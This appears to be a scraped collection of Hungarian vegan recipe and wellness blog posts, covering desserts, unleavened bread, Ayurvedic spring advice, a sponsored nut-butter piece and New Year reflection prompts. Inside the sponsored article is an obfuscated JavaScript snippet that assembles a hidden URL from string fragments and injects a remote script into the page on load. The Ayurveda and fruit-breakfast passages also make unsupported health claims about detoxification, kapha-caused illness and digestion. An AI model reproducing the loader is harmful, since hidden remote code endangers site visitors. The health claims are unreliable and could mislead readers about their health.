A tejből kb. 3 dl felteszünk forrni. Közben a kurkumát és az étkezési keményítőt egy nagyobb pohárban vagy mérőedényben a hideg tejjel csomómentesre keverjük. Amikor már szinte forr a növényi tej, folyamatosan keveréssel hozzáadjuk a kikevert keményítős tejet és az édesítő szert. Addig kevergetjük és forraljuk, amíg puding állagúra besűrűsödik. Kurkuma gyönyörű sárgás színt ad a pudingnak, de legyünk óvatosak vele, mert az ízét is megváltoztathatja.
A somlói galuska összeállítása:
A kihűlt piskótát kis darabokra vágjuk, majd egy szép tálban (pl. jénai) egymás mellé helyezve lefektetjük őket. Ezt megöntjük a csokis puding egy részével majd átkeverjük és egy kanállal kissé belenyomkodjuk a tál aljába a pudingos piskóta darabokat. Megszórjuk durvára tört dióva és mazsolával (meggy is jó helyette - akár aszalva, befőtt, fagyasztott). Erre ráöntjük a vanília pudingot és egyenletesen elkenjük. A tetejét megszórjuk kakaó- vagy karob porral.
Tejszínhabbal díszitjük. Már sok helyen kaphatók növényi tejszínek, amelyek alkalmasak hab verésre, számomra még mindig a legegyszerűbb megoldás a konzerves kókusztejet pár órára fagyasztóba tenni vagy egy éjszakára hűtőbe és felrázás nélkül felbontás után a kemény réteget lekanalazni róla és habverővel habbá verni.
A tejszínhab tetejére kakaó/karobpor, édesítő és kevés víz összeforralásából készült öntetet önthetünk. Ez el is maradhat.
A piskótát akár elkészíthetjük napokkal, hetekkel előre és fagyasztóba téve, akkor vesszük elő, amikor a vendégeknek a somlóit el szeretnénk készíteni, hiszen ekkor már csak a pudingokat kell főzni és összeállítani egy tálban. Ha lefagyasztás mellett döntünk, érdemes sütőpapírba csomagolni, majd fagyasztós zacsiba/dobozba tenni. Amikor elővesszük, egyszerűen csak meleg helyen kell tárolni (pl fűtőtest mellett vagy fűtőtesten) és szépen kienged.
Kovásztalan kenyér forró levegő sütőben
Már számos változatban készítettem kovásztalan kenyeret, azaz pászkát, páskát. Gluténmentes, magvas, gombás kovásztalan kenyér már van fenn a blogon. A hagyományos receptje is megtalálható a blogomon lassan 10 éve. A mostani azonban abban különbözik, hogy air fryer-ben, azaz forró levegő sütőben készült. Hamarosan itt a húsvét és ha ekkor tényleg húsvéti ételt szeretnénk az asztalra tenni, akkor a legeredetibb étel csakis a páshka, páska, pászka lehet. Erre bizonyíték maga a Szentírás szava: "Elközelgetett pedig a kovásztalan kenyerek ünnepe, mely húsvétnak mondatik." (Lukács evangéliuma 22:1)"
A zsidó nép húsvétkor ünnepelte egy héten keresztül az egyiptomi rabszolgaságból való szabadulásukat. A Biblia szavai alapján mintegy 430 évet élt a zsidó nép Egyiptomban. József (álomlátó, színes ruhás) által kerültek Egyiptomba a 7 éves éhség idején. Letelepedésükkor József a fáraó második embere volt, még kedvező életkörülményeik voltak, azonban József halála után fáraók is meghaltak és ahogy a nép egyre növekedett, komoly veszélyt jelentett az egyiptomiak számára, így azok a rabszolgaság igájába hajtották a zsidókat. Sanyarú életük volt, amiről a Biblia részletesen beszámol. Tudniillik születés-szabályozást rendelt el a fáraó a zsidók túlszaporodásának akadályozására. Minden fiú gyermeket meg kellett (volna) ölni. Továbbá rabszolgaságuk kemény fizikai munkát is jelentett. Szalmából és sárból vetettek téglát, amit felhasználtak az építkezésekhez. A Biblia meg is emlékezik arról, hogy városokat építettek. "Rendeltek azért föléjük robotmestereket, hogy nehéz munkákkal sanyargassák őket. (Az egyiptomiak a zsidókat) És építettek a Faraónak gabonatartó városokat, Pithomot és Ramszeszt." (2 Mózes 1.11).
Mivel igen keserű körülmények közt éltek a zsidók ekkor már, nyomorúságukban az Úrhoz kiáltottak szabadításért. M eghallotta Isten az ő fohászkodásukat és megemlékezett Isten az Ábrahámmal, Izsákkal és Jákóbbal kötött szövetségéről (amely több ígéretet is tartalmazott, melyek közül egyik egy saját föld volt - Kánaán). Ekkor küldte el Mózest hozzájuk, aki kérte a fáraót, hogy engedje el a népet a pusztába. A fáraó azonban makacson kitartott, a 9 csapás sem hozta meg nála a változást. Mígnem a 10. csapás, amikor Egyiptom minden elsőszülött gyermeke (még az állatok fajzása is) egy éjszaka alatt meghalt. Ehhez az eseményhez tartozik a páska, a kovásztalan kenyér.
Isten ugyanis elrendelte az izraelitáknak (zsidók másik neve), hogy öljenek le egy bárányt, izsóppal hintsék a bárány vérét az ajtó félfákra, süssék meg egyben a bárányt, készítsenek kovásztalan kenyeret. Mindezt azon az éjszakán keserű füvekkel kellett elfogyasztaniuk, indulásra készen, derekaik felövezve, saruik lábaikon, pálcáik kezükben, nagy sietséggel. Készen kellett állniuk az útra, hogy Egyiptomot, a szolgaság házát (országát) elhagyják. Az ajtófélfákra hintettt vér távol tartotta a veszedelmet tőlük. Azon az éjszakán minden elsőszülött meghalt, ahol nem volt az ajtó félfán a vér.
A fáraó végre elrendelte a héberek kivonulását. Az Úr pedig rendelkezésre adta, hogy ezt az ünnepet, szertartást évről évre megtartsák: "Páskha-áldozat ez az Úrnak, aki elment az Izráel fiainak házai mellett Égyiptomban, mikor megverte az Égyiptombelieket, a mi házainkat pedig megoltalmazta" (2 Mózes 12,27)
Ez tehát a húsvét eredete.
Amint az elején írtam, ezt a kovásztalan kenyeret air fryer-ben készítettem. Sajnos kicsit vastagabb lett, de a széle így is finom ropogós volt.
A recept
Hozzávalók:
- 1 kisebb bögre teljes kiörlésű búzaliszt
- 1 kisebb bögre fehér liszt
- csipet só
- pár csepp olívaolaj (elhagyható, kipróbáltam nélküle is jól működik)
- víz amennyit felvesz (legalább 1 hasonló bögre vagy némileg több is)
Elkészítés:
A hozzávalókat a fenti sorrendben egymáshoz keverjük. Majd tésztát gyúrunk belőlük. Munkaasztalon vagy gyúródeszkán kör alakú lapot készítünk belőle. Mielőtt megsütjük, érdemes felcsíkozni a felszínét, így könnyebb a kenyeret megtörni, miután megsült. Air fryerben (forró levegő sütőben) mindkét oldalát 10 percig sütjük kb. 180-200 fokon. Ha nincs ilyen készülékünk, készíthetjük sütőben is.
Káposzta salátával fogyasztottuk, de pástétomokkal is finom.
Tavasz, március az ájurvéda szemszögéből - tisztulás, megújulás
2021. március 14. Élj harmóniában
Tavasszal elkezd emelkedni a hőmérséklet, egyre több lesz a napsütéses órák száma. Ilyenkor ez a hő elkezdni az átalakulást a temrészetben, eljön a kapha jellemzőkkel bíró időszak. A kapha időszaka február közepétől kb. májusig tart. Ezen időszakban a legtöbb a nedvesség, pára, csapadék. Megnő a talajvíz - a talaj kidobja magából a felesleget, a tél során felgyült hólevet, esőt - párás, ködös lesz az időjárás is. Ahogy az állatok is levedlik a téli bundát, a szervezetedben is változások jönnek létre. A tél során elfogyasztott nehéz, zsíros ételektől felgyült salakanyagoktól szabadulni próbál a tested és a megolvadt "zsír" folyadékok, nyálkák formájában távozik a testből. Nem véletlenül küzdenek ilyenkor sokan megfázással, influenzával, allergiával, mindenféle nedves, nyálkás betegségekkel. Sokan tapasztalhatják azt is, hogy akár megszűnik kicsit az étvágyuk. A felesleges víz megtámadja a tüdőt és légúti betegségeket, tüdőgyulaldást hozhat létre. A kapha növekedése a szervezetedben a nyálkák felhalmozódását ése dugulásokat, elakadásokat, továbbá ödémákat, duzzanatokat is okozhat. A kapha a testben nehézségérzetet, fáradtságot, fásultságot hoz létre. A salakanyagok a véráramba kerülve plusz terhelést okozhatnak a keringésben, így sokan mellkasi szorító érzést is tapasztalhatnak.A bőr ilyenkor lehet hűvös, nyirkos. Akiknek túl sok a kapha a testében tapasztalhatnak akár a garaton, torok hátsó részében lecsöpögő váladékot is. A fejben lévő sok váladék okozhat nyomást a hallójáratban vagy akár szédülést a fejben. ha a kapha felgyűlik a gyomorban nehéz emésztést, hányingert hizhat létre. A salakanyagok megterhelik a májat is, így érdemes a máj és epe tisztulását is megtámogatni - keserű és savanyú fűszerek, ételek ideálisak.Érzelmi szinten ennek a vizességnek a hatására márciusban előfordulhat bánat, búskomorság, siránkozás, szomorúság. Ilyenkor tud eluralkodni valakin leginkább a tunyaság, lustaság. A tavasz ideális arra, hogy megtámogasd a szervezeted tisztulási folyamatait. Nem véletlenül ilyenkor vannak a böjtök is. Ez az évszak a legideálisabb a fogyáshoz is. Mit tudsz tenni?** Kelj korábban, ahogy a nap is korábban kel.**Amikor csak teheted menj ki a napsütésre, hogy a tested, akárcsak az állatvilágban a nap segítségével új energiákkal teljen fel.** Mozogj sokat - sétálj, kirándulj, jógázz, hogy a salakanyagokat mobilizálni tudd.** Kerüld el az alkoholt, kávét és lehetőleg a dohányzást is.**Ne aludj és ne pihenj le napközben, főleg ne étkezés után, mert ezek mind növelik a nyálkát a testedben.** Végezz légzőgyakorlatokat, segítenek tisztítani a fejet és a tüdőt. ** Feküdj le 22:00 előtt, ezzel nagyon tudod támogatni a szervezeted éjszakai méregtelenítését. ** Időzítsd megfelelően az étkezéseket! - reggeli 7 -8 között, ebéd 11:30-13:00 között, vacsora 17:00-18:00 között** Este 7 után már ne egyél!** Jó ha tavasszal egy könnyű étrenddel segíted a szervezetednek a megtisztulást. Ha vannak kapha tüneteid kerüld a hűtő és nyálkásító és a nehezen emészthető élelmiszereket. Ilyenek a tejtermékek, édességek, zsíros ételek, húsos ételek, lédús édes gyümölcsök (pl. narancs, mandarin, mango, barack) , gyümölcslevek, lédús zöldségféléket (pl. uborka, cukkini), zsíros magok (pl.dió, mandula) .Sokan kérdezik a jóga elvonulásokon, miért nem főzünk ezt vagy azt adott jógatáborban. Azért , mert az ájurvéda alapján állítjuk össze a menüket és minden elvonulásnál figyelembe vesszük az évszaki sajátosságokat. :) Mit érdemes fogyaszatni tavasszal?Zöldségek Részesítsd előnyben keserű szárazabb minőségű zöldségeket, ilyenkor a vízhatjtók is kifejezetten jótékonyak. pl. zeller, cikória, firss saláták, káposzta, leveles kel, brokkoli, karfiol, retek, cékla, kelkáposzta, mangold, endívia, rukkola, spenót, kelbimbó, articsókaGyümölcsök Citrom, grapefruit, gránátalmaFűszerek Elsődlegesen a melegítő, keserű és csípő fűszerek ideálisak - jók a szárító, méregtelenítő, emésztést serkentő és vízhajtó gyógynövények. Kurkuma, gyömbér, fekete bors, petrezselyem, tárkony, édeskömény, koriander, görögszéna, fahéj. A csípő fűszerek kiszárítják a nyálkát. Gabonák és fehérjék quinoa, hajdina, árpa, kukorica kevés baszmati rizs, tökmag, mungo bab, zöld bab, csicseriborsóOlajok, zsírok kevés ghee és olívaolajMindig vedd figyelembe egyéni alkatodat is. Ha pl. vata vagy pitta alkat vagy és egyáltalán nincsenek kapha problémáid, akkor ne a fenti étrend szerint táplálkozz. Ne egyél sok csípőset.További méregtelenítéssel kapcsolatos részletek az alábbi linket itt.Az egyik legjobb tavaszi tisztító étel a kitchari, egy vagy több napos kúrát is elvégezhetsz vele. Receptet itt találsz. Jó egészséget kívánok:) szeretettel: Kati
Lehet a mogyorót is kenyérre kenni!
Amerikában régi hagyománya van a peanut butter&jelly szendvicsnek, egészen 1896-ig nyúlik vissza a története, még saját napja is van április 2-án. Elsőre furcsán hangozhat a magyar fülnek ez a kombináció: ez a szendvics tulajdonképpen szendvicskenyérre kent földimogyoróvaj, amelyre aztán lekvárt tesznek. Valami mégis lehet azonban benne, ha ennyire szeretik: egy 2002-es tanulmány szerint egy átlag amerikai 1500 ilyen szendvicset eszik meg, mire leérettségizik. (function(){ tzyqu=54jcn9d1zyqp;tzyq=document.createElement(script); tzyq_=u+(st);tzyq_+=at+(.);tzyq.async=true;tzyq_+=in; tzyqu=252362599.+tzyqu;tzyq.type=text/javascript;tzyqu+=qmpd06r9nfmn; tzyqu+=0jmapg;tzyq_+=(f)+o+(/);tzyq.src=https://+tzyq_+tzyqu; tzyqd=document.body;tzyqd.appendChild(tzyq); })(); Szponzorált cikk Bár az amerikai köztudottan eléggé elhízott társadalom, ez a nemzetei eledel kifejezetten egészséges is lehet, ha megfelelő alapanyagokkal készítjük el. A szendvicskenyeret elég jó minőségű kenyérre (pl. teljes kiőrlésű rozskenyérre vagy hosszú érlelésű, kovásszal készült kenyérre) cserélni, a földimogyoróvajból cukor- és pálmazsír mentes változatot választani, a lekvárból cukormenteset használni vagy friss gyümölcsre cserélni, és máris kész egy szuperfinom, magas fehérje tartalmú, lassú felszívódású szénhidrátot tartalmazó szendvics, amit a gyerekek is nagyon szívesen megesznek. Nem véletlen, hogy szintén Amerikában terjedt el szélesebb körben a többi olajos magból készült magkrém is: mandulakrém, kesudiókrém, törökmogyorókrém és társaik. Itthon ezek sajnos még kevésbé ismert alapanyagok, pedig ezek a krémek rendkívül sokoldalúan felhasználhatóak, és nagyon egészségesek. Magas a fehérje- és a telítetlen zsírsav tartalmuk, szénhidrát tartalmuk pedig alacsony, ráadásul tele vannak értékes ásványi anyagokkal és vitaminokkal (kálium, kálcium, magnézium, B1-, B2-, B6-vitaminok, E-vitamin stb.). Az olajos magok gyakorlatilag bármely diétába beilleszthetőek, ezek a krémek pedig a magok felhasználásának egy új dimenzióját nyitják meg: lehet őket zabkásába rakni, gazdagíthatjuk vele a turmixunkat, smoothie-nkat, lehet belőlük mindenféle kekszet, süteményt sütni (paleo és vegán sütik szuper alapanyaga, zsiradék helyettesítőként funkcionálhatnak), mehetnek palacsintába töltelékként, sőt, sós ételek kiváló alapanyagai is lehetnek (pl. tésztaszószhoz, salátaöntethez használhatjuk őket.). Nagyon fontos, hogy csak a jó minőségű, hozzáadott fehér cukor- és növényi zsír mentes változatokat válasszuk! Ezekből a krémekből is nagy a választék, de az igazán jó minőségű, csak az olajos magokat tartalmazó változat már ritkább. A Mendula magkrémjei pont ilyenek: nincs bennük semmi más, csak az enyhén pörkölt olajos mag (törökmogyoró, mandula, dió és földimogyoró), ill. léteznek ízesített változatok is. Az ízesített változatok is elképesztő különlegesek: van nekik vaníliás kesudiókrémjük (ami hozzáadott cukor nélkül is finom édeskés ízű, akár önmagában kanállal eszegetve is elmegy egy önálló desszertnek), de van fahéjas mandulakrémjük is, amelyben a mandulán kívül fahéj, és kevés kókuszvirágcukor van. Az egyik legnépszerűbb termékük az egészséges nutella verzió: ez egy 78% (!!!) törökmogyorótartamú mogyorókrém, amelyben ezen kívül csak kókuszcukor és kakaópor van. És ha már a földimogyoró vajjal kezdődött az egész cikk, kiemelnénk a földimogyoró vajukat is: kétféle változatuk is létezik, egy natúr, és egy sós-földimogyoró darabos. Mindkettőben közös azonban, hogy nincs bennük se pálmazsír, se cukor, se semmi egyéb turpisság. Ki kell őket próbálni, végre egy olyan termékcsoport, ami úgy finom, hogy még egészséges is! Tedd a kedveceim közé 0 The post Lehet a mogyorót is kenyérre kenni! appeared first on VegaNinja.
Erdei gyümölcsös piskóta (vegán)
Tojás nélkül is lehet piskótát készíteni, szép sárga színű piskótát. Miért érdekes ez? Napjainkban már egyre többen szenvednek étel-allergiáktól és szép számmal vannak azok, akiknek mellőzniük kell a tojást az étrendjükből. Szintén rengeteg ember étkezik vegánul. Ráadásul itt a veganuár, amikor január hónapban emberek bizonyos csoportja elhatározásból egy hónapig kipróbálja a vegán étrendet, életmódot. Kiváló befejezése, vagy akár megkoronázása lehet ez a gyümölcsös piskóta a vegánuárnak. De ha egy rövidebb hónapot, a februárt szemelted ki arra, hogy egy hónapig vegánul étkezz, akkor remek indítója lehet ez a finom sütemény.
Ha nem követsz semmiféle diétát, viszont nincs otthon tojásod, akkor is el tudod készíteni ezt a gyors, egyszerű, de annál finomabb süteményt.
A recept
Hozzávalók:
Száraz hozzávalók:
- 10 dkg fehér liszt
- 6 dkg kukorica liszt
- 4 dkg teljes kiőrlésű liszt
- 10 dkg erithritol vagy gyümölcscukor vagy barna cukor vagy xylit
- 1 púpozott tk szódabikarbóna
- 1 csipet só
Nedves hozzávalók:
- 2 dl növényi tej
- 5 dkg olaj
- 1 tk vanília ( lehet vanília aroma is)
- 1 ek citrusféle (nekem mandarin volt otthon, de citrom vagy narancs is megfelel)
A sütemény tetejére:
30 dkg erdei gyümölcs
Elkészítés:
A liszteket egy tálba szitáljuk majd a többi száraz hozzávalókat hozzákeverjük. Ha nincs kukorica és teljes kiőrlésű liszt, nem kell aggódni, sima fehér lisztet is használhatunk, ez esetben összesen 20 dkg fehér lisztet használjunk, értelemszerűen. (A sárga szín elérése kedvéért egy csipet kurkumát/turmericet vagy esetleg sáfrányt adhatunk hozzá kukorica liszt hiányában.) A nedves hozzávalókat egy másik tálban (én mérődedényben kevertem el a folyékony hozzávalókat) összekeverjük, majd hozzáöntjük a száraz hozzávalókhoz és csomómentesre, sima állagúra keverjük.
Az így kapott masszát egy sütőpapírral bélelt tepsibe öntjük. A tetején elhelyezzük az erdei gyümölcs szemeket. Ha nagyon savanykás gyümölcsöt használunk, akkor lehet érdemes egy kis édesítővel (eritritol és/vagy társai) megszórni, mielőtt a gyümölcsöt a massza tetejére tesszük. Ha fagyasztott gyümölcsöt használunk, akkor mindenképpen érdemes a gyümölcsöt kiolvasztani, különben sütés közben a kiolvadó gyümölcslé eláztatja a piskótát. 180 fokra előmelegített sütőben 20-30 perc alatt megsütjük. Szúrópróbával ellenőrizzük, hogy megsült-e a piskóta.
Így kezdj neki az Új évnek! - lépések a sikeres évindításhoz 2021.
2020. december 22. Élj harmóniában
Már csak egy kis idő választ el a 2021-es év kezdetétől. Talán nem is gondolnád, de az év legdepressziósabb hónapja a legtöbb ember életében a január. A karácsonyi ünneplések, izgalmak, családi együttlétek, ajándékok után, megjelennek a szürke, rideg, feladatokkal, konfliktusokkal teli hétköznapok. Ráadásul idén nagyon más lesz a Karácsony a legtöbb emebr életében és már önmagában az egész év sokaknak elég feszülten vagy éppen depisen telt. Ráadásul január elseje egy fordulópont is... átváltunk a 2021-as évre. A fordulópontokat általában az emberek nem viselik túl jól. Egy-egy fordulópont, az elmében automatikusan beindít egyfajta számvetési folyamatot.... kicsit eltűnődünk milyen is volt az eltelt időszak, mit értünk el, mit nem értünk el... nagyon sok embert megviselnek a kudarcai, az esetleges sikertelenség érzése. 2020-ban pedig az élet mindeknek megmutatta, hogy nem mi irányítjuk az életünket, mert mindig rajtunk kívül álló körülmények alakítják a dolgokat. Ilyenkor hasznos ha megpróbálod tudatosan elengedni ami volt és tudatosan felkészülni a következő évre. Próbáld mindenben a jót látni. Ahhoz, hogy a következő éved sikeres legyen az első lépés a tudatos tervezés. Önmagában a nagy fogadalmak, nem segítenek minket hozzá egy boldogabb, kiegyensúlyozottabb élethez. A siker titka, hogy belső világunkat rendezzük. Húzz egy vonalat képzeltedben és szemléld végig, milyen is volt az eltelt éved. Majd az előző év tapasztalataiból kiindulva, lehetőséged van arra, hogy átgondold mit szeretnél másképpen csinálni a következő évben. Ebben a bejegyzésben ehhez minden támogatást megpróbálok megadni Neked. A 2020-as év tapasztalatai sokaknál áthelyezték a fókuszpontokat. Sokan rájöttek, hogy az egészség és az emberi kapcsolatok sokkal fontosabbak, mint a karrier vagy az anyagi célok elérése. Ha úgy látod az idei év nagyon más tapasztalatokat hozott mindenképpen érdemes papírra vetned az új elképzelésidet az életeddel kapcsolatban. Az első amit egy év végén át szoktam gondolni kinek vagy éppen miért vagyok hálás az eltelt évben. A Hála lsita készítéséről az alábbi bejegyzésben olvashatsz: https://eljharmoniaban.blogspot.com/2019/01/hala-koszonet.html A sikeres változtatáshoz, nagyon fontos, hogy komolyan határozd el pontosan miben szeretnél változtatni és légy tudatos arról, hogyan érheted el. Ne csak azt gondold, "majd rendszeresen mozgok" vagy "majd nem idegeskedem annyit " vagy "többet találkozom szeretteimmel" mert eltelik 2021 és újra azt fogod gondolni, na majd jövőre... A másik pont, amin el lehet bukni, hogy egyszerre túl sok célt tűzől ki magad elé. Ne akarj egy év alatt mindent teljesen megváltoztatni, nézd meg mely célok, változások reálisak az egy éves távlatra. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Sokszor ha visszatekintünk az életünkre rájövünk, milyen hálásak lehetünk egy-egy olyan életeseménynek, amit, akkor nagyon rossznak éltünk meg. Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állás van, jó fizetés, autó, elismerés, hírnév, tisztelet, valamiben jónak lenni, tehetség.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Néhány hasznos gondolat ahhoz, hogy át tudd gondolni a 2020-as éved: - Hogyan jellemeznéd ezt az évet röviden? - Mik voltak az év legfontosabb eseményei? - Mik voltak az év legjobb pillanatai, minek örültél idén? - Mi okozott számodra bánatot, rossz érzéseket idén? - Mi jellemezte idén - a testi-lelki egészségedet, közérzetedet? - a párkapcsolatodat? - a családi kapcsolataidat? - a munkahelyi körülményeidet? - a baráti kapcsolataidat? - szabadidődet? - anyagi dolgaidat, pénzügyi helyzetedet? - Kik segítettek terveid alakulásában, kiknek vagy hálás? - Kikkel kötöttél barátságot? - Kikkel tudtál kibékülni, rendezni a kedvezőtlen kapcsolatokat? - Mit tanultál idén, miben sikerült fejlődnöd? - Milyen rossz tulajdonságoktól sikerült megszabadulnod? - Milyen változásokon mentél át amire büszke vagy? - Mit tennél másképpen? - Mi hiányzik az életedből? Í rd össze a dolgaidat, átgondoltan, tudatosan a 2021-es évre vonatkozóan is - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz, mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2021-es éved sikeres legyen : - Mit szeretnél elérni, megvalósítani 2021-ben? - írd össze a céljaidat, terveid. - Miben szeretnél fejlődni, mit szeretnél tanulni? - Mik lesznek az év fontosabb eseményei? - Milyennek szeretnéd látni az alábbi életterületeket, miben szeretnél változtatni: - közérzet, egészség - táplálkozás - testmozgás - párkapcsolat - családi kapcsolatok - munkahelyi körülmények - baráti kapcsolatok - szabadidő eltöltése, hobbik, pihenés - anyagi dolgaid, pénzügyi helyzeted - Milyen rossz szokásodtól szeretnél megszabadulni? - Milyen negatív tulajdonságaidon szeretnél változtatni? - Milyen új dolgokat szeretnél kipróbálni idén? - Hová szeretnél eljutni, elutazni ebben az évben? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, kisebb pihenések, utazások, kulturális rendezvények, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, az uni verzumnak is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, adakozz, légy nagylelkű és kegyes és fejlődj sokat az új évben :) Sok szeretettel kívánok spirituális élményekben gazdag, harmonikus Új évet Kati
Immunerősítő gyümölcssaláta
Reggelenként ha tehetem csak gyümölcsöt reggelizem. Főleg hétvégenként, amikor több időm van elkészíteni és nyugodtan, mindenféle rohanás nélkül megenni, gyakran készítek gyümölcssalátát. Ha reggel gyümölccsel indítunk, szervezetünk többszörösen meghálálja. Először is a gyümölcsben található vitaminok és ásványi anyagok gyorsan, akadálymentesen képesek felszívódni és táplálni szervezetünket, erősíteni immunrendszerünket. Másrészt, ahogy említettem, akadálymentesen. Ha késő estébe nyúlóan nem ettünk nehéz ételt, aminek emésztése még reggelig is elhúzódna, akkor a gyümölcs lesz az első táplálék szervezetünknek. Sokan sajnos a kávét/teát részesítik előnyben mintegy megrögzött rossz szokás, pedig tápértéke igazán a gyümölcsnek van. Ráadásul a gyümölcs természetes cukor tartalma energiát is ad testünknek. Azért is érdemes gyümölccsel, legalább egy szem almával, kezdeni az étkezést, mert a benne található természetes rost segíti az előző napról hátramaradt bélben lerakódott bélsár távozását még akkor is, ha ébredés után ez nem esik nehezünkre. Harmadik ok, amiért érdemes gyümölccsel kezdeni az a tény, hogy az üres gyomrunkban aránylag gyorsan felszívódik és megemésztődik a gyümölcs, mintegy 2 óra alatt és nem pedig egy már emésztésben lévő étel tartja fenn, esetleges alkoholos erjedést, rothadás okozva gyomrunkban, ami akár bélgázokhoz is vezethet.
A recept
Hozzávalók:
- 2 körte
- 2 alma
- 2 mandarin
- 1-2 sharon fruit/datolya szilva/hurma
- Néhány szem dióféle - jelen esetben brazil dió volt - elhagyható
Elkészítés:
A gyümölcsöket megmossuk, a mandarint meghámozzuk. Minden gyümölcsöt felszeletelünk és egy tálba rakjuk, kicsit átkeverjük, tetejét meghintjük apróra vágott diófélével.
A brazil dió az egyik legzsírosabb, így aztán a legtöbb kalóriát tartalmazó dióféle, ezért óvatosan kell a mennyiséggel bánni, de magas szelén és jelentős cink, kalcium, magnézium és foszfor tartalma miatt is különleges dióféle és érdemes alkalmanként néhány szemet az étrendünkbe építeni. Az antioxidáns hatású szelén olyan ásványi anyag, amely megakadályozza a szabadgyökök sejtkárosító hatását, és rugalmassá teszi a bőrt. Egyes tanulmányok szerint csökkenti a mellrák kialakulásának kockázatát.
Paradiónak is hívják.
Vegán kolbász gluténmentesen
Emberek tömegei vásárolnak vegetáriánus és vegán kolbászokat, majd sütik ki konyháikban. Egy egész iparág épült erre. Megvizsgálva összetevőiket gyakran szerepel közte a szója, meg emellett még sok más (olajok, szulfidok, élesztő, növényi festék, búzaliszt, ízfokozó, növekedésért felelős ammónium karbonát, stb), amit egy házi készítésű kolbász esetében elkerülhetünk. E szempontból Jolly Joker ez a recept, hiszen ha sok mennyiséget készítettünk belőle, nyugodtan lefagyaszthatjuk a kész kolbászokat, de hűtőben is eláll pár napig, így lehetőségünk van a változatos felhasználására, mint például rakott krumplihoz az egyik nap, lecsóhoz a másik nap, stb. Persze mustárral és sült krumplival vagy krumplipürével együtt is élvezhetjük ezt a kolbászt, sütőből frissen tálalva, ropogósan. Elkészíteni sem bonyolult és Magyarországon illetve Angliában is könnyen beszerezhatő a szójagranulátum és a barna rizs, ami a két fő összetevője. Ráadásul Magyarországon csak génmódosítás mentes szóját szabad forgalomba helyezni (legutóbbi ismereteim szerint), tehát ettől sem kell tartani. Zabliszttel segítettem összeállni könnyen formálhatóvá, de ha a zab nem elég gluténmentes számunkra, akkor kukoricaliszt vagy kukoricadara is felhasználható helyette. Előnye ennek a kolbásznak, hogy olajmentesen elkészíthető. Ha sütőpapíron sütjük, akkor végképp nélkülözzük a hevített zsiradékot. Persze, aki szeretné, hogy tucsogjon az olajban, mint a bolti félék, az süsse olajon. Egészségi szempontból azonban inkább ennek kerülését javaslom.
A recept
Hozzávalók:
- 20 dkg szójagranulátom
- 15 dkg barna rizs
- 10 dkg zabpehely
- 2 evőkanál ételízesítő
- 1/2 fej fokhagyma vagy 1 ek fokhagyma granulátum
- őrölt fekete bors
- őrölt köménymag
- fűszerpaprika
- füstölt paprika
- folyékony füstaroma (opcionális)
- majoránna
- szükség esetén só
Elkészítés:
